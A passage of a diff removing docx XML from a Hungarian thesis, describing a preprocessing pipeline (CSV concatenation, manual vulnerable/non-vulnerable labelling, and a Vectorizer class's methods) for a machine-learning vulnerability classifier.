-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-as ábra: pdo1_ast.csv, a nodes.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kimenete, a 3.2-es ábra bemenetre</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> következő lépésben a .csv fájlokat </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>fűzi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> össze</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>concatenate.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>concatenated.csv fájlb</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a. E</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>zen</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a pont</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>on</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">manuálisan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>felcímkéz</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>em őket</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nnak duplikáltjában, a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> concatenated_titled.csv</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-ben</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A duplikálás oka, miszerint minden egyes újrafuttatásakor a concatenate.py újraírja a concatenated.csv-t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ezáltal</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ha a manuális változtatások nem kerülnének át más fájlba, akkor elvesznének</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Az összefűzés</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egyszerű oka</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> pedig</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az összes </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>csv viszonylatában</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> csak a saját</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>jában.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Így a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>vectorizer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.py </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>már a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>összefűzött</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és felcí</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kézett </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>concatenated</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>_titled</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.csv-t dolgozza fel.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A fájl legfőbb feladata</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, hogy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> olyan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>numpy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájl</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>okat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hoz</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>zon</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> létre, ami</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ket</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> később az osztályozásért felelős fájl használni</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tud.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Kifejtve a főbb metódusait:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1134" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>__init__</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Vectorizer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> osztály konstruktora</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ami </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">paraméterként </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kér egy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>fájl nevet</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>filename</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">annak a felső határát, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">egy sorban </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hány szó fordul elő </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>max_vocab</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a felső határát, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hány szó van </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ténylegesen</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>max_length</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A paraméterek változókba helyezésén kívül még inicializál</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>va van egy számláló (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>word_freqs</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>), két szótár (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>word2index, indextoword</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, egy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>táblázat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>dataset</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>) és a kimeneti vektoroknak egy-egy változó (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>X, y</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1134" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">collectVocab: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">etódus, ami </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>word_freqs</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> változóba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> teszi a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dataset </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>0.oszlopá</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">nak szavait </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>előfordulási szám</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>uk</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>at, utóbbi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> szerint csökkenő sorrendben.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1134" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">createLookupTables: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>etódus</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, ami </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>word2index</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">változóba teszi </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>word_freqs</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> szavait</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sorrendnek megfelelően </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2-től </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>indexelve</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-egy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>indexet</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> társít hozzájuk</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> nulladik és első index</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a *** és ismeretlen szavakhoz van fenntartva</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">word2index </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>változóba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>value-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">index, az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>index2word-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>be pedig index</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-value</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>formában kerülnek be a szavak</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az indexükkel.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1134" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">createVectors: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
